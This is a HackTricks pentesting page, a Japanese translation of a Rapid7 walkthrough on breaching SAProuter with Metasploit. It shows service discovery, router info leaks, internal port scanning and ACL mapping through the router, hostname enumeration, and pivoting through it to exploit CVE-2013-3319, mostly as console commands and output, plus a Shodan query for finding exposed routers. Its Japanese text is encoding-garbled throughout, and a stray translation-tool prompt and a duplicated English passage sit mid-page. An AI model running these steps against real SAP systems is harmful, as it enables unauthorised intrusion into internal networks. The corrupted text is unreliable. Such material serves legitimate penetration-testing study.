âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
- **ãµã€ããŒã»ãã¥ãªãã£äŒæ¥**ã§åããŠããŸããïŒ **HackTricksã§äŒç€Ÿã宣äŒ**ãããã§ããïŒãŸãã¯ã**PEASSã®ææ°ããŒãžã§ã³ã«ã¢ã¯ã»ã¹ããããHackTricksãPDFã§ããŠã³ããŒã**ãããã§ããïŒ[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)ããã§ãã¯ããŠãã ããïŒ
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)ãèŠã€ããŠãã ãããç¬å çãª[**NFT**](https://opensea.io/collection/the-peass-family)ã®ã³ã¬ã¯ã·ã§ã³ã§ãã
- [**å
¬åŒã®PEASSïŒHackTricksã®ã°ããº**](https://peass.creator-spring.com)ãæã«å
¥ããŸãããã
- [**ð¬**](https://emojipedia.org/speech-balloon/) [**Discordã°ã«ãŒã**](https://discord.gg/hRep4RUj7f)ãŸãã¯[**telegramã°ã«ãŒã**](https://t.me/peass)ã«**åå **ãããã**Twitter**ã§**ãã©ããŒ**ããŠãã ãã[**ðŠ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ãããã³ã°ã®ããªãã¯ãå
±æããã«ã¯ã[hacktricksãªããžããª](https://github.com/carlospolop/hacktricks)ãš[hacktricks-cloudãªããžããª](https://github.com/carlospolop/hacktricks-cloud)**ã«PRãæåºããŠãã ããã
Copy of: [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
# Metasploitã䜿çšããŠSAProuterãçªç Žãã
Saprouterã¯åºæ¬çã«SAPã·ã¹ãã çšã®ãªããŒã¹ãããã·ã§ãããéåžžã¯ã€ã³ã¿ãŒããããšå
éšã®SAPã·ã¹ãã ã®éã«é
眮ãããŸãããã®äž»ãªç®çã¯ãéåžžã®ãã¡ã€ã¢ãŠã©ãŒã«ãããSAPãããã³ã«ã®çŽ°ããå¶åŸ¡ãå¯èœã«ãããããã€ã³ã¿ãŒãããäžã®ãã¹ãããå
éšã®SAPã·ã¹ãã ãžã®å¶åŸ¡ãããã¢ã¯ã»ã¹ãèš±å¯ããããšã§ãã
ããã¯ãsaprouterãçµç¹ã®ãã¡ã€ã¢ãŠã©ãŒã«ã§saprouterãã¹ããžã®ã€ã³ããŠã³ãTCPããŒã3299ãèš±å¯ããããšã§ãéåžžã€ã³ã¿ãŒãããã«å
¬éãããããšãæå³ããŸãããããŠãsaprouterããã¯å°ãªããšãå
éšã®SAPãµãŒããŒã«å°éã§ããã¯ãã§ããããã¯éåžžã«èå³æ·±ãã¿ãŒã²ããã§ããã"é«ã䟡å€"ã®ãããããã¯ãŒã¯ãžã®é²å
¥çµè·¯ãæäŸããå¯èœæ§ããããŸãã
以äžã®å³ã¯ãäŸãšããŠäœ¿çšããåºæ¬çãªãããã¯ãŒã¯æ§æã瀺ããŠããŸãïŒ
![](https://blog.rapid7.com/content/images/post-images/33923/image1.jpg)
ãŸãã[`sap_service_discovery`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery)ã¢ãžã¥ãŒã«ã䜿çšããŠãå
¬éãããIPã¢ãã¬ã¹ïŒãã®å Žåã¯1.2.3.101ïŒã®SAPãµãŒãã¹ã¹ãã£ã³ãå®è¡ããŸãã
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
RHOSTS => 1.2.3.101
msf auxiliary(sap_service_discovery) > run
[*] [SAP] Beginning service Discovery '1.2.3.101'
[+] 1.2.3.101:3299 - SAP Router OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
ã¹ãã£ã³çµæã«ãããšããã¹ãã¯äºæ³ãããTCPããŒã3299ã§SAPã«ãŒã¿ãå®è¡ããŠããŸããããã§ããã«è©³ãã調æ»ããsaprouterããæ
å ±ãååŸããããšè©Šã¿ãããšãã§ããŸããèšå®ã誀ã£ãŠããå ŽåããããŠãã°ãã°ããã§ãããsaprouterãä»ããŠå
éšãã¹ããžã®æ¥ç¶ãªã©ãå
éšæ
å ±ãååŸããããšãå¯èœã§ãããã®ç®çã®ããã«ã[`sap_router_info_request`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request)ã¢ãžã¥ãŒã«ã䜿çšããŸãã
```text
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
RHOSTS => 1.2.3.101
msf auxiliary(sap_router_info_request) > run
[+] 1.2.3.101:3299 - Connected to saprouter
[+] 1.2.3.101:3299 - Sending ROUTER_ADM packet info request
[+] 1.2.3.101:3299 - Got INFO response
[+] Working directory : /opt/sap
[+] Routtab : ./saprouttab
[SAP] SAProuter Connection Table for 1.2.3.101
===================================================
Source Destination Service
------ ----------- -------
1.2.3.12 192.168.1.18 3200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
ãããã£ãŠãåºåãããããããã«ãã€ã³ã¿ãŒãããäžã®èª°ãïŒ1.2.3.12ïŒãå
éšãã¹ãïŒ192.168.1.18ïŒã®ããŒã3200ã«æ¥ç¶ããŠããŸããããŒã3200ã¯ãDIAGãããã³ã«ã®äžè¬çãªSAPããŒãã§ãïŒããã¯SAP GUIã¢ããªã±ãŒã·ã§ã³ãSAPãµãŒããŒã«æ¥ç¶ããå Žæã§ãïŒããŸããå
éšIPã¢ãã¬ã¹ã¹ããŒã ã«é¢ããæ
å ±ãååŸããŠããããããã192.168.1.0/24ãããã¯ãŒã¯ãŸãã¯ãã®ãããã¯ãŒã¯å
ã®ããã€ãã®ãµããããã䜿çšããŠããããšãã»ãŒç¢ºå®ã§ãã
**å
éšãã¹ããšãµãŒãã¹ã®åæ**
ãã®æ
å ±ãå
ã«ãå
éšãããã¯ãŒã¯ã®ã¹ãã£ã³ãéå§ã§ããŸããsaprouterã¯ãããã·ã®ããã«æ©èœãããããããã«æ¥ç¶ããŠå
éšãã¹ããšããŒããžã®æ¥ç¶ãèŠæ±ããsaprouterããã®å¿çã確èªããŸããããã«ãããsaprouterã®èšå®ã«å¿ããŠãå
éšãã¹ãããµãŒãã¹ãããã³ACLã«é¢ãããããªãæŽå¯ãåŸãããå ŽåããããŸãããã®ç®çã®ããã«ã[`sap_router_portscanner`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner)ã¢ãžã¥ãŒã«ã䜿çšããŸãã
ãã®ã¢ãžã¥ãŒã«ã¯saprouterã«æ¥ç¶ããæå®ããTCPããŒãã§ä»ã®ãã¹ãïŒTARGETSãªãã·ã§ã³ã§å®çŸ©ïŒãžã®æ¥ç¶ãèŠæ±ããŸãããã®åŸãå¿çãåæããèŠæ±ãããæ¥ç¶ãå¯èœãã©ãããå€æããŸãããã®ã¢ãžã¥ãŒã«ã«ã¯ããã€ãã®ãªãã·ã§ã³ããããŸãã
```text
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
INSTANCES 00-99 no SAP instance numbers to scan (NN in PORTS definition)
MODE SAP_PROTO yes Connection Mode: SAP_PROTO or TCP (accepted: SAP_PROTO, TCP)
PORTS 32NN yes Ports to scan (e.g. 3200-3299,5NN13)
RESOLVE local yes Where to resolve TARGETS (accepted: remote, local)
RHOST yes SAPRouter address
RPORT 3299 yes SAPRouter TCP port
TARGETS yes Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.
```
å°ãªããšããsaprouterã®IPã¢ãã¬ã¹ãèšå®ããå¿
èŠããããŸããäŸãã°ã1.2.3.101ã§ãã次ã«ãã¹ãã£ã³ãããå
éšãããã¯ãŒã¯ã®ã¢ãã¬ã¹ãTARGETSã«èšå®ããæåŸã«ã¹ãã£ã³ããTCPããŒããPORTSã«èšå®ããŸãã
ãã®ã¢ãžã¥ãŒã«ã«ã¯ãPORTSãªãã·ã§ã³ã®å®çŸ©ãç°¡çŽ åããINSTANCESãªãã·ã§ã³ããããŸããSAPã®ã€ã³ã¹ããŒã«ã§ã¯ãè€æ°ã®ã€ã³ã¹ã¿ã³ã¹ããµããŒããããŠãããåæ§ã®ãµãŒãã¹ãæäŸãããŠããŸãããããã£ãŠãåã€ã³ã¹ã¿ã³ã¹ã«ã¯å²ãåœãŠãããTCPããŒãããããŸããäŸãã°ãSAPã€ã³ã¹ã¿ã³ã¹00ã¯ããŒã3200ã§SAPãã£ã¹ãããã£ãŒãµãŒãã¹ïŒSAP GUIãæ¥ç¶ãããµãŒãã¹ïŒãæã¡ãã€ã³ã¹ã¿ã³ã¹01ã¯ããŒã3201ã§æäŸãããŸããPORTSãªãã·ã§ã³ã¯ãã¯ã€ã«ãã«ãŒãããšããŠãNNãããµããŒãããŠãããã€ã³ã¹ã¿ã³ã¹çªå·ã§çœ®ãæããããŸãããããã£ãŠã00ãã50ãŸã§ã®ã€ã³ã¹ã¿ã³ã¹ãã¹ãã£ã³ãããå Žåã以äžã®ããã«INSTANCESãšPORTSå€æ°ãå®çŸ©ããããšãã§ããŸãã
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
PORTS => 32NN
```
ãã®èšå®ã§ã¯ãã¢ãžã¥ãŒã«ã¯ããŒã3200ãã3250ã®ç¯å²ã§ã¹ãã£ã³ãè¡ããŸãã
ã¢ãžã¥ãŒã«ã®ãœãŒã¹ã«ã¯ãSAPã·ã¹ãã ã®äžè¬çãªããã©ã«ãããŒãã«é¢ããæ
å ±ããããŸãããããã¹ãã£ã³ã«äœ¿çšããŸãã
```text
msf > use auxiliary/scanner/sap/sap_router_portscanner
msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_router_portscanner
msf auxiliary(sap_router_portscanner) > set RHOST 1.2.3.101
RHOST => 1.2.3.101
msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.18
TARGETS => 192.168.1.18
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > set PORTS 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
PORTS => 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 3201 closed SAP Dispatcher sapdp01
192.168.1.18 3200 open SAP Dispatcher sapdp00
192.168.1.18 50013 open SAP StartService [SOAP] sapctrl00
[*] Auxiliary module execution completed
```
ç§ãã¡ã¯ãsaprouterãä»ããŠäžéšã®æ¥ç¶ãèš±å¯ãããªãçç±ãç解ããããã«ãVERBOSEãªãã·ã§ã³ã䜿çšããŠã¿ãããšãã§ããŸããVERBOSEãtrueã«èšå®ãããŠããå Žåãsaprouterããã®å¿çãèŠãããšãã§ããå®çŸ©ãããACLããããã³ã°ããããšãã§ããŸãã
ä»åã¯ãããŒã3200ã§ã®ã¿ã192.168.1.18ãš192.168.1.1ã®ãã¹ããã¹ãã£ã³ããŠãäž¡æ¹ã®SAPãã£ã¹ãããã£ãŒã«æ¥ç¶ã§ãããã©ããã確èªããŸãã
```text
msf auxiliary(sap_router_portscanner) > set VERBOSE true
VERBOSE => true
msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.1,192.168.1.18
TARGETS => 192.168.1.1,192.168.1.18
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
PORTS => 32NN
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[+] 192.168.1.18:3200 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 3200 open SAP Dispatcher sapdp00
[*] Scanning 192.168.1.1
[-] 192.168.1.1:3200 - blocked by ACL
[!] Warning: Service info could be inaccurate
[*] Auxiliary module execution completed
```
**ACLã®ãããã³ã°**
saprouterã«ã€ããŠèå³æ·±ãããšã¯ã2çš®é¡ã®æ¥ç¶ããµããŒãããŠããããšã§ãã
- ãã€ãã£ã - ãããã®æ¥ç¶ã¯åçŽãªTCPæ¥ç¶ã§ãã
- SAPãããã³ã« - ãããã¯TCPæ¥ç¶ã§ããããã³ã«ã§ã¯ãã¹ãŠã®ã¡ãã»ãŒãžãåŸç¶ã®ã³ã³ãã³ãã®é·ãã瀺ã4ãã€ãã§å§ãŸããšèŠå®ãããŠããŸãã
SAPãããã³ã«ã¯saprouteråºæã®ãã®ã§ãããSAP GUIãsaprouterãä»ããŠSAP DIAGããŒãã«æ¥ç¶ããããã«äœ¿çšããŸãããã€ãã£ããããã³ã«ã¯ãä»ã®ã¿ã€ãã®æ¥ç¶ãsaprouterãéããŠèš±å¯ããããã«äœ¿çšãããŸãã
ãã®ã¢ãžã¥ãŒã«ã§ã¯ãã¹ãã£ã³äžã«ãã¹ãããæ¥ç¶ã®ã¿ã€ããMODEãªãã·ã§ã³ã§æå®ããããšãã§ããŸããããã©ã«ãã¯SAPãããã³ã«ã§ããããããæãäžè¬çã«äœ¿çšãããå¯èœæ§ããããŸãããã ããsaprouterãä»ããŠä»ã®ãµãŒãã¹ãèš±å¯ãããŠããå ŽåãACLã¯ãã€ãã£ãïŒTCPïŒæ¥ç¶ãèš±å¯ããå ŽåããããŸãã
æ¥ç¶ã®ã¿ã€ããèš±å¯ããããã«MODEãTCPã«èšå®ããããšãã§ããŸããä»åã¯ãå
éšãã¹ããã¹ãã£ã³ããã€ã³ã¹ã¿ã³ã¹00ãš01ã®äž¡æ¹ã§ããŒã3200ïŒSAP DIAGïŒãš80ïŒHTTPïŒã®äž¡æ¹ã§VERBOSEãtrueã«èšå®ããŠãäœãèµ·ãããã確èªããŸãã
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
MODE => TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
PORTS => 80,32NN
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[+] 192.168.1.18:80 - TCP OPEN
[-] 192.168.1.18:3200 - blocked by ACL
[+] 192.168.1.18:3201 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 80 open
192.168.1.18 3201 open SAP Dispatcher sapdp01
[*] Scanning 192.168.1.1
[-] 192.168.1.1:3200 - blocked by ACL
[+] 192.168.1.1:3201 - TCP OPEN
[+] 192.168.1.1:80 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.1 3201 open SAP Dispatcher sapdp01
192.168.1.1 80 open
[*] Auxiliary module execution completed
```
From the output and the previous information we now know that the ACL is something like this:
* ä»»æã®ãã¹ããã192.168.1.1ãžã®ããŒã80ãžã®TCPæ¥ç¶ãèš±å¯ããŸãã
* ä»»æã®ãã¹ããã192.168.1.18ãžã®ããŒã80ãžã®TCPæ¥ç¶ãèš±å¯ããŸãã
* ä»»æã®ãã¹ããã192.168.1.1ãžã®ããŒã3201ãžã®TCPæ¥ç¶ãèš±å¯ããŸãã
* ä»»æã®ãã¹ããã192.168.1.18ãžã®ããŒã3201ãžã®TCPæ¥ç¶ãèš±å¯ããŸãã
* ä»»æã®ãã¹ããã192.168.1.18ãžã®ããŒã3200ãžã®SAPæ¥ç¶ãèš±å¯ããŸãã
**å
éšãã¹ãã®ç²ç®çãªåæ**
æãåºããŠãã ãããç§ãã¡ã¯saprouterããã®æ
å ±ãååŸããŠãå
éšãã¹ãã®IPã¢ãã¬ã¹ãç¥ãããšãã§ããããããé²ãã§ããŸãããããããããsaprouterããã®æ
å ±ãæäŸããŠãããªãã£ããã©ãã§ããããïŒ
1ã€ã®ãªãã·ã§ã³ã¯ãåã«ãã©ã€ããŒãã¢ãã¬ã¹ã¹ããŒã¹ãã¹ãã£ã³ããŠãäœãèµ·ããããèŠãããšã§ãããã1ã€ã®ãªãã·ã§ã³ã¯ããã¹ãåã«ããç²ç®çãªåæã§ãã
Saprouterã¯ãç§ãã¡ãæ¥ç¶ãèŠæ±ãããã¹ãåã解決ããããšãã§ããŸãããŸããsaprouterã¯æ¥ç¶ã«å€±æããå Žåã«ã©ã®ãããªãšã©ãŒãçºçããããæããŠãããŸãïŒã¢ãžã¥ãŒã«ãœãŒã¹ã®242è¡ç®ã®ã³ã¡ã³ãã解é€ããããšã§å®éã®å¿çã確èªã§ããŸãïŒã
ãã®æ©èœã«ããããã¹ãåã«ããå
éšãã¹ãã®åæãå¯èœã«ãªããçŽæ¥ç®çã®æ
å ±ãååŸããããšããããšãã§ããŸãããã®éã«IPã¢ãã¬ã¹ãç¥ãå¿
èŠã¯ãããŸããã
ãã¹ããç²ç®çã«åæããéã«èŠããŠããã¹ãéèŠãªãã€ã³ãïŒ
* VERBOSEãtrueã«èšå®ããŸãã
* MODEãSAP_PROTOã«èšå®ãããŠããå Žåãsaprouterããããå€ãã®æ
å ±ãååŸã§ããŸãã
* ãã®æ®µéã§ã¯saprouterãéä¿¡ããæ
å ±ã«ã®ã¿èå³ããããããã¹ãã£ã³ããããŒãã¯1ã€ã ãèšå®ããã°ååã§ãïŒ3200ãè©ŠããŠã¿ãŠãã ããïŒã
* çµæã¯èšå®ãããACLã«ãã£ãŠç°ãªããŸããæ®å¿µãªããããããã¯ãããæ¥ç¶ã¯ããŸãæ
å ±ãæäŸããŠãããŸããã
ãã®äŸã§ã¯ããã¹ãåsapãsapsrvãsapsrv2ãè©ŠããŠã¿ãŸãã
```text
msf auxiliary(sap_router_portscanner) > set RESOLVE remote
RESOLVE => remote
msf auxiliary(sap_router_portscanner) > set MODE SAP_PROTO
MODE => SAP_PROTO
msf auxiliary(sap_router_portscanner) > set VERBOSE true
VERBOSE => true
msf auxiliary(sap_router_portscanner) > set TARGETS sap,sapsrv,sapsrv2
TARGETS => sap,sapsrv,sapsrv2
msf auxiliary(sap_router_portscanner) > set PORTS 3200
PORTS => 3200
msf auxiliary(sap_router_portscanner) > run
[*] Scanning sap
[-] sap:3200 - unknown host
[!] Warning: Service info could be inaccurate
[*] Scanning sapsrv
[-] sapsrv:3200 - host unreachable
[!] Warning: Service info could be inaccurate
[*] Scanning sapsrv2
[+] sapsrv2:3200 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
sapsrv2 3200 open SAP Dispatcher sapdp00
[*] Auxiliary module execution completed
```
以äžã¯ããããã³ã°æè¡ã«é¢ããæ¬ã®å
容ã§ãã以äžã®å
容ã¯ããã¡ã€ã«/hive/hacktricks/network-services-pentesting/3299-pentesting-saprouter.mdããã®ãã®ã§ããé¢é£ããè±æãæ¥æ¬èªã«ç¿»èš³ãã翻蚳ãè¿ããããŒã¯ããŠã³ãšHTMLã®æ§æãå®å
šã«ä¿æããŠãã ãããã³ãŒãããããã³ã°æè¡ã®ååããããã³ã°ã®èšèãã¯ã©ãŠã/SaaSãã©ãããã©ãŒã ã®ååïŒWorkspaceãawsãgcpãªã©ïŒã'leak'ãšããåèªããã³ãã¹ããããã³ããŒã¯ããŠã³ã¿ã°ãªã©ã¯ç¿»èš³ããªãã§ãã ããããŸãã翻蚳ãšããŒã¯ããŠã³ã®æ§æ以å€ã®è¿œå ã®ãã®ã¯è¿œå ããªãã§ãã ããã
```markdown
From the output we see that the host âsapâ does not exist, but that host sapsrv does, although it is unreachable, and sapsrv2 exists and we can connect to port 3200.
This technique can also be used to try to find other hosts on the network, not SAP related, just try using common hostnames, like smtp, exchange, pdc, bdc, fileshare, intranet, or what other nice hostnames you might have on your bag of tricks
**The last mile**
Now that we have obtained all this information, we know the internal hosts available, what services are allowed, and what protocols we can use to pierce the saprouter, we can actually connect to internal servers, and proceed with our pentest.
Metasploit provides us with an awesome way to saprouter as a proxy, using the Proxies option, thanks to Dave Hartley \([@nmonkee](http://twitter.com/nmonkee)\).
So at this point, we want to start gathering information on the internal sap server we have discovered in host 192.168.1.18. As an example, we'll be using the module [`sap_hostctrl_getcomputersystem`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem) which exploits CVE-2013-3319 and give us details on the OS the server is running on by querying the SAP Host Control service on port 1128 via an unauthenticated SOAP request. We'll be pivoting through the saprouter, using the proxy support in metasploit:
![](https://blog.rapid7.com/content/images/post-images/33923/image2.jpg)
```
```markdown
åºåãããããããã«ããã¹ããsapãã¯ååšããªããããã¹ãsapsrvã¯ååšãããå°éã§ãããsapsrv2ã¯ååšãããŒã3200ã«æ¥ç¶ã§ããã
ãã®æè¡ã¯ãSAPã«é¢é£ããªãä»ã®ãã¹ããèŠã€ããããã«ã䜿çšã§ããŸããsmtpãexchangeãpdcãbdcãfileshareãintranetãªã©ã®äžè¬çãªãã¹ãåã䜿çšããŠã¿ãŠãã ããããŸãã¯ãããªãã¯ã®è¢ã«å
¥ããŠããä»ã®çŽ æµãªãã¹ãåã䜿çšããŠã¿ãŠãã ããã
**æåŸã®äžãã€ã«**
ããã§ãå©çšå¯èœãªå
éšãã¹ããèš±å¯ãããŠãããµãŒãã¹ãsaprouterãçªç Žããããã«äœ¿çšã§ãããããã³ã«ãããã£ãã®ã§ãå®éã«å
éšãµãŒããŒã«æ¥ç¶ãããã³ãã¹ããé²ããããšãã§ããŸãã
Metasploitã¯ãProxiesãªãã·ã§ã³ã䜿çšããŠsaprouterããããã·ãšããŠäœ¿çšããçŽ æŽãããæ¹æ³ãæäŸããŠãããŸããããã¯ãDave Hartley \([@nmonkee](http://twitter.com/nmonkee)\)ã®ãããã§ãã
ãããã£ãŠããã®æç¹ã§ããã¹ã192.168.1.18ã§çºèŠããå
éšsapãµãŒããŒã«é¢ããæ
å ±ãåéãå§ããããšæããŸããäŸãšããŠã[`sap_hostctrl_getcomputersystem`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem)ã¢ãžã¥ãŒã«ã䜿çšããŸãããã®ã¢ãžã¥ãŒã«ã¯CVE-2013-3319ãæªçšããèªèšŒãããŠããªãSOAPãªã¯ãšã¹ããä»ããŠããŒã1128ã§SAP Host ControlãµãŒãã¹ã«ã¯ãšãªãéä¿¡ããããšã§ããµãŒããŒãå®è¡ãããŠããOSã®è©³çŽ°ãæäŸããŸããMetasploitã®ãããã·ãµããŒãã䜿çšããŠsaprouterãããããããŸãã
![](https://blog.rapid7.com/content/images/post-images/33923/image2.jpg)
```
```text
msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
Proxies => sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
RHOSTS => 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run
[+] 192.168.1.18:1128 - Information retrieved successfully
[*] 192.168.1.18:1128 - Response stored in /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_386124.xml (XML) and /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_186948.txt (TXT)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
ãããã¹ãŠããŸãããã°ãã¿ãŒã²ããã®SAPãã¹ãããã®èå³æ·±ãå
éšæ
å ±ïŒå
éšã®ãŠãŒã¶åãªã©ïŒãå«ããlootå
ã®ã¢ãžã¥ãŒã«ã®çŽ æµãªåºåãåŸãããã§ãããããã®åŸããã«ãŒããã©ãŒã¹æ»æãè©Šã¿ãããšãã§ããŸãã
ããããã¯ãSAPã·ã¹ãã ã ãã§ãªããå
éšãã¹ãã«å¯ŸããŠä»ã®ã¢ãžã¥ãŒã«ãå®è¡ããããã«äœ¿çšããããšãã§ããŸãïŒäœ¿çšãã¹ãã§ãïŒïŒã
**çµè«**
匱ãsaprouterã®èšå®ãæªçšããããšã§ãã€ã³ã¿ãŒãããçµç±ã§å
éšãã¹ãã«ã¢ã¯ã»ã¹ããããšãå¯èœã§ããããšãèŠãŠããŸãããããã¯ãmetasploitãSAPã·ã¹ãã ã®ãã³ãã¹ãããµããŒãããããã«äœ¿çšãããã ãã§å®çŸãããŸãã
ãã®èšäºããsaprouterã®å±éã«é¢é£ãããªã¹ã¯ãšSAPã»ãã¥ãªãã£ã®äž¡æ¹ã«ã€ããŠã®ç解ãæ·±ããã®ã«åœ¹ç«ã€ããšãé¡ã£ãŠããŸãã
**åèæç®**
* [http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/](http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/)
* \[[http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nun ez Di Croce - SAProuter .pdf\]\([http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nunez Di Croce - SAProuter .pdf\)
* [http://scn.sap.com/docs/DOC-17124](http://scn.sap.com/docs/DOC-17124)
* [http://help.sap.com/saphelp\_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/f rameset.htm](http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm)
* [http://help.sap.com/saphelp\_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767 /content.htm](http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm)
* [http://labs.integrity.pt/advisories/cve-2013-3319/](http://labs.integrity.pt/advisories/cve-2013-3319/)
* [SAP Service Discovery \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery)
* [SAPRouter Admin Request \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request)
* [CVE-2013-3319 SAP Host Agent Information Disclosure \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem)
* [SAPRouter Port Scanner \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner)
# Shodan
* `port:3299 !HTTP Network packet too big`
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
- **ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§ããªãã®äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãææ°ããŒãžã§ã³ã®PEASSãå
¥æããããHackTricksãPDFã§ããŠã³ããŒãããããããã§ããïŒ[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)ããã§ãã¯ããŠãã ããïŒ**
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)ãçºèŠããŸããããç¬å çãª[**NFT**](https://opensea.io/collection/the-peass-family)ã®ã³ã¬ã¯ã·ã§ã³ã§ãã
- [**å
¬åŒã®PEASSïŒHackTricksã®ã°ããº**](https://peass.creator-spring.com)ãæã«å
¥ããŸãããã
- [**ð¬**](https://emojipedia.org/speech-balloon/) [**Discordã°ã«ãŒã**](https://discord.gg/hRep4RUj7f)ãŸãã¯[**ãã¬ã°ã©ã ã°ã«ãŒã**](https://t.me/peass)ã«åå ãããã**Twitter** [**ðŠ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**ããã©ããŒããŠãã ããã**
- **ãããã³ã°ã®ããªãã¯ãå
±æããã«ã¯ã[hacktricks repo](https://github.com/carlospolop/hacktricks)ãš[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**ã«PRãæåºããŠãã ããã